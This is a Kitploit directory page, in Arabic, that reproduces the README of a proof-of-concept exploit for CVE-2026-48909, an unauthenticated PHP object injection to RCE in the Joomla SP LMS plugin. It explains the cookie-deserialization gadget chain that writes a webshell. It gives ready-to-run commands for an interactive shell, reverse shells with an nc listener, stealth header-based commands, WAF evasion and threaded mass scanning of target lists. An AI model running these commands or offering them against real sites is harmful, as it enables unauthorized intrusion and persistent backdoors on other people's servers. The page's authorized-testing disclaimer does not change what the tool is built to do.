Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - استغلال حقن كائن PHP غير مصادق عليه إلى RCE لملحق Joomla SP LMS الإصدارات <= 4.1.3. يستغل إلغاء تسلسل ملف تعريف الارتباط lmsOrders لكتابة قشرة ويب عبر سلسلة أدوات FormattedtextLogger في Joomla. يتضمن قشرة تفاعلية، واكتشاف المسار، والتنظيف. لاختبار الأمان المصرح به فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
تحليل الثغرات الأمنيةتحليل الكودالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمر
تطوير الحمولات
مختبرات وتدريب عملي
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

عرض المستودع
22منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

CVE-2026-48909 - استغلال حقن كائن PHP غير مصادق عليه إلى RCE لملحق Joomla SP LMS الإصدارات <= 4.1.3. يستغل إلغاء تسلسل ملف تعريف الارتباط lmsOrders لكتابة قشرة ويب عبر سلسلة أدوات FormattedtextLogger في Joomla. يتضمن قشرة تفاعلية، واكتشاف المسار، والتنظيف. لاختبار الأمان المصرح به فقط.

مشاركة

CVE-2026-48909

Joomla SP LMS — حقن كائنات PHP غير موثَّق → تنفيذ أوامر عن بُعد

Python Version CVSS License Platform

أداة إثبات المفهوم لتقييم CVE-2026-48909
المؤلف: Sudeepa Wanigarathna

joomla1

[!IMPORTANT] للاستخدام المصرّح به فقط. هذه الأداة مخصّصة للبحث الأمني والتعليم واختبار الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرّح به إلى أنظمة الحاسوب غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الميزات
  • التثبيت
  • بداية سريعة
  • دليل الاستخدام
  • مرجع الأوامر
  • أنواع الحِمْل
  • سلسلة الهجوم
  • أمثلة المخرجات
  • استكشاف الأخطاء
  • هيكل المستودع
  • تاريخ الإصدارات
  • إخلاء المسؤولية
  • المؤلف

نظرة عامة

CVE-2026-48909 هي ثغرة حقن كائنات PHP غير موثَّق خطيرة في إضافة SP LMS الخاصة بـ Joomla. تنفّذ هذه الأداة سلسلة الهجوم الكاملة ليتمكّن مختصو الأمن من التحقق من التأثير في بيئات المختبر أو البيئات المصرّح بها.

تغطّي الأداة الاكتشاف، واستكشاف المسار، وتوصيل الحِمْل، واستغلال تفاعلي بعد الاستغلال (حيثما يُسمح)، والتقييم الجماعي، والتنظيف الاختياري.


تفاصيل الثغرة

السمةالقيمة
معرف CVECVE-2026-48909
CVSS9.5 (حرجة)
متجه الهجومشبكة — غير موثَّق
التأثيرتنفيذ أوامر عن بُعد
المنتج المتأثرJoomla SP LMS
الإصدارات المتأثرة1.0.0 – 4.1.3
الإصدار المُصحَّحSP LMS 4.1.4+
سلسلة الأدوات (Gadget Chain)تتطلب Joomla < 5.2.2

مصفوفة التوافق

المكوّنالإصدارRCE
SP LMS< 4.1.4معرّض للثغرة
SP LMS≥ 4.1.4مُصحَّح
Joomla< 5.2.2سلسلة الأدوات قابلة للاستخدام
Joomla≥ 5.2.2سلسلة الأدوات مُصحَّحة

الميزات

الأساسية

الإمكانيةالوصف
استغلال غير موثَّقلا حاجة لبيانات اعتماد
حمولات متعددة7 متغيرات لشيل الويب / تنفيذ الأوامر
شيل تفاعليجلسة تاريخ الأوامر بعد النشر
اكتشاف المساراستكشاف تلقائي للمسارات القابلة للكتابة
تنظيفإزالة شيل الويب المُنشَر بعد الاختبارات

التقييم والعمليات

الإمكانيةالوصف
مسح جماعيقوائم أهداف متعددة الخيوط (1000+)
دعم الوكيل (Proxy)HTTP/SOCKS (Burp، ZAP، إلخ)
شيل عكسيحمولات قائمة على المُستمِع
وضع التخفيقنوات أوامر عبر الترويسة أو POST
العشوائيةأسماء UUID للشيل، تدوير User-Agent
إعداد التقاريرتصدير بصيغة JSON أو HTML أو CSV
مساعدات الكشففحص إصدار Joomla، --check-only، --safe-mode

ملاحظات حول التهرب

  • يتجنّب الأحرف المحظورة بواسطة فلتر cmd في Joomla قدر الإمكان
  • مسار كتابة PHP مشفّر بالنظام الست عشري لتقليل مشكلات الوسادة (padding) / الشرطة المائلة في base64
  • تأخيرات قابلة للتكوين وتدوير User-Agent
  • منطق إعادة المحاولة عبر عدة مرشّحات للحقن / المسار

التثبيت

المتطلبات الأساسية

  • Python 3.6+
  • pip
  • إمكانية الوصول الشبكي إلى الهدف (الأهداف) قيد الاختبار

الإعداد

root@kitploit:~
cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

التبعيات

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0

argparse يأتي مع المكتبة القياسية لـ Python؛ لا يحتاج إلى تثبيت عبر pip.


بداية سريعة

استبدل https://target.example بهدف مختبر أو مصرّح به فقط.

هدف واحد — اكتشاف المسار + شيل تفاعلي

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

فحص آمن (بدون استغلال)

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

مسح جماعي

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

شيل عكسي (مختبر مصرّح به)

root@kitploit:~
# المستمع
nc -lvnp 4444

# مضيف الاستغلال
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

دليل الاستخدام

اكتشاف المسار

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

مسار كتابة معروف

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

جلسة تفاعلية

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

أمر لمرة واحدة

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

حمولة تخفّي + تفاعلي

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

وكيل (Burp / ZAP)

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

التنظيف

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

تنسيق قائمة الأهداف

root@kitploit:~
https://lab-a.example
https://lab-b.example
https://lab-c.example
root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

مرجع الأوامر

الهدف

الوسيطةالوصف
targetعنوان URL للهدف الواحد
--targets, -T FILEملف يحتوي على الأهداف (عنوان URL في كل سطر)
--path PATHالمسار المطلق على الخادم لشيل الويب
--shell-type TYPEminimal، standard، stealth، base64، full، reverse، blindshell
--shell-name NAMEاسم ملف شيل الويب (الافتراضي: x.php)

الشبكة

الوسيطةالوصف
--timeout SECONDSمهلة الطلب (الافتراضي: 15)
--insecureتخطي التحقق من شهادة TLS
--proxy URLمثال: http://127.0.0.1:8080
--random-uaتدوير User-Agent (مفعل افتراضياً)
--delay SECONDSتأخير بين الطلبات

الشيل العكسي

الوسيطةالوصف
--reverse-host HOSTمضيف المستمع
--reverse-port PORTمنفذ المستمع

الأوضاع

الوسيطةالوصف
--interactive, -iشيل تفاعلي بعد النشر
--check-onlyفحص الثغرة فقط
--safe-modeاختبار غير تخريبي
--find-pathاكتشاف تلقائي لمسار قابل للكتابة
--cmd COMMANDتنفيذ أمر واحد ثم الخروج
--cleanup PATHإزالة شيل الويب عند المسار المحدد
--cleanup-afterالتنظيف بعد الاستغلال

المسح الجماعي / التقرير

الوسيطةالوصف
--threads NUMعدد خيوط العمل (الافتراضي: 10)
--export FILEمسار مخرجات النتائج
--export-format FORMATjson، html، csv (الافتراضي: json)

التسجيل

الوسيطةالوصف
--log-file FILEكتابة السجلات إلى ملف
--quiet, -qوضع صامت
--verbose, -vإخراج مفصل
--no-bannerإخفاء الشعار

أنواع الحِمْل

النوعالسلوكالاستخدام النموذجي
minimalتنفيذ مضغوط عبر GETمساحة ضيقة / اختبار سريع
standardGET + POST cmd (الافتراضي)تقييمات عامة
stealthالأمر عبر ترويسة X-Cmdتقليل تسجيل عنوان URL
base64eval(base64_decode(...)) عبر POSTمختبرات تهرب من الفلاتر
fullGET/POST + قناة base64تحكم أوسع
reverseشيل اتصال عكسيوصول مستمر في المختبر
blindshellنمط إدراج / تنفيذ بديلبيئات مقيدة
root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type minimal --find-path
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path -i
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type reverse \
  --reverse-host 10.0.0.1 --reverse-port 4444 --find-path

سلسلة الهجوم

root@kitploit:~
flowchart TD
    A["Attacker-controlled lmsOrders cookie"] --> B["unserialize() in cart.php"]
    B --> C["FormattedtextLogger::__destruct()"]
    C --> D["File::write() — PHP drop"]
    D --> E["Webshell on disk"]
    E --> F["Remote command execution"]

ملخص تقني

  1. المصرف (Sink) — components/com_splms/models/cart.php يقوم بإلغاء تسلسل ملف تعريف الارتباط lmsOrders المُفكَّك بواسطة base64.
  2. الأداة (Gadget) — تؤدي Joomla\CMS\Log\Logger\FormattedtextLogger::__destruct() إلى كتابة على نظام الملفات.
  3. الحِمْل — كود PHP مُشفر بالنظام الست عشري، مع حشو الطول لتجنب أحرف base64 المُرشَّحة (/، =, +).
  4. التنفيذ — يتم طلب السكريبت المُنشَر لتنفيذ أوامر نظام التشغيل.

تجاوز فلتر الإدخال (مستوى عالٍ)

قد يقوم فلتر cmd في Joomla بإزالة / و = و +. تعوّض هذه الأداة عن ذلك من خلال:

  • ترميز محتوى الكتابة بالنظام الست عشري
  • حشو النماذج المسلسلة / base64 لتجنب الأحرف غير القانونية
  • التكرار عبر المرشحات حتى يتم إنتاج حِمْل آمن من الفلتر

أمثلة المخرجات

جلسة تفاعلية

root@kitploit:~
shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell> whoami
www-data

shell> pwd
/var/www/html

shell> exit

تصدير JSON (الشكل)

root@kitploit:~
{
  "timestamp": "2026-07-16T10:30:00.123456",
  "target": "https://lab.example",
  "shell_path": "/tmp/x_abc123def.php",
  "shell_url": "https://lab.example/tmp/x_abc123def.php",
  "shell_type": "standard",
  "vulnerable": true,
  "exploited": true,
  "joomla_version": "4.3.2",
  "detected_paths": [
    "/tmp/x_abc123def.php",
    "/images/x_abc123def.php",
    "/cache/x_abc123def.php"
  ],
  "author": "Sudeepa Wanigarathna",
  "tool_version": "3.0"
}

أمر لمرة واحدة

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

استكشاف الأخطاء

العَرَضما يجب تجربته
تعذّر إنشاء حِمْل آمن من الفلترمسار --path مختلف، أو استخدام --find-path؛ تجنب الأحرف غير المألوفة في المسار
فشل التحقق من الشيلزيادة --timeout؛ تجربة --shell-type standard؛ التأكد من عدم تعطيل system() أو ما يشابهه؛ التحقق من قابلية الكتابة
الهدف لا يبدو معرّضاً للثغرةSP LMS ≤ 4.1.3، Joomla < 5.2.2، وجود com_splms؛ فحص حظر جدار الحماية (WAF)
HTTP 500استخدام --insecure، --timeout 30، مراجعة سجلات التطبيق/الخادم
رفض اتصال الوكيلالتأكد من أن الوكيل يستمع؛ صحة مخطط URL والمضيف/المنفذ
فشل التحقق من TLSإضافة --insecure لنقاط نهاية المختبر ذات الشهادات المعطلة

سير عمل التصحيح

root@kitploit:~
# مفصل + تسجيل ملف
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path -v --log-file debug.log

# عبر Burp
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path \
  --proxy http://127.0.0.1:8080 --insecure -v

# غير تخريبي أولاً
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

هيكل المستودع

root@kitploit:~
exploit/
├── CVE-2026-48909 v3.0.py   # الأداة الرئيسية (الإصدار 3.0)
├── requirements.txt         # تبعيات Python
├── README.md                # هذا الملف
└── venv/                    # بيئة افتراضية محلية (اختياري، غير مضمّن)

إضافات اختيارية للإصدار العام:

root@kitploit:~
targets.txt.example
docs/technical-details.md
examples/basic-exploit.sh
examples/mass-scan.sh

تاريخ الإصدارات

v3.0.0 — الإصدار النهائي (يوليو 2026)

  • مسح جماعي مع تعدد الخيوط
  • دعم وكيل HTTP/SOCKS
  • حمولات الشيل العكسي
  • أدوات مساعدة للتهرب من جدران الحماية (WAF)
  • شيل تخفي تفاعلي
  • خيارات تنظيف تلقائي
  • تقارير JSON / HTML / CSV
  • قائمة مسارات كتابة موسعة
  • مساعدات كشف إصدار Joomla
  • الوضع الآمن وتدوير User-Agent
  • تأخيرات طلب قابلة للتكوين

v2.1 — الإصدار الاحترافي (يوليو 2026)

  • إصلاحات في توليد الحِمْل
  • معالجة أخطاء وتسجيل أقوى

إخلاء المسؤولية

هذا المشروع مُقدم كما هو لأغراض البحث الأمني الدفاعي واختبار الاختراق المصرّح به.

باستخدام هذا البرنامج، فإنك توافق على:

  1. أنك ستستهدف فقط الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
  2. أنك تفهم قوانين إساءة استخدام الحاسوب وحماية البيانات السارية.
  3. أن المؤلف والمساهمين غير مسؤولين عن أي ضرر أو فقدان بيانات أو عواقب قانونية ناتجة عن سوء الاستخدام.

إذا اكتشفت هذه الثغرة في بيئة حقيقية، فاتبع ممارسات الإفصاح المسؤول وتنسّق مع البائع / CERT حيثما يناسب.


المؤلف

Sudeepa Wanigarathna
باحث أمني · اختراق أخلاقي · بحث في الثغرات · أدوات Python


الدعم

  • قم بتمييز المستودع بنجمة إذا كان مفيداً لبحثك
  • افتح مشكلة (Issue) للأخطاء أو النتائج الإيجابية الزائفة
  • نرحب بطلبات السحب (PRs) للتوثيق ودقة الكشف وتجربة المستخدم في المختبرات المصرّح بها

لاختبار الأمن المصرّح به فقط.

تنزيل الأداة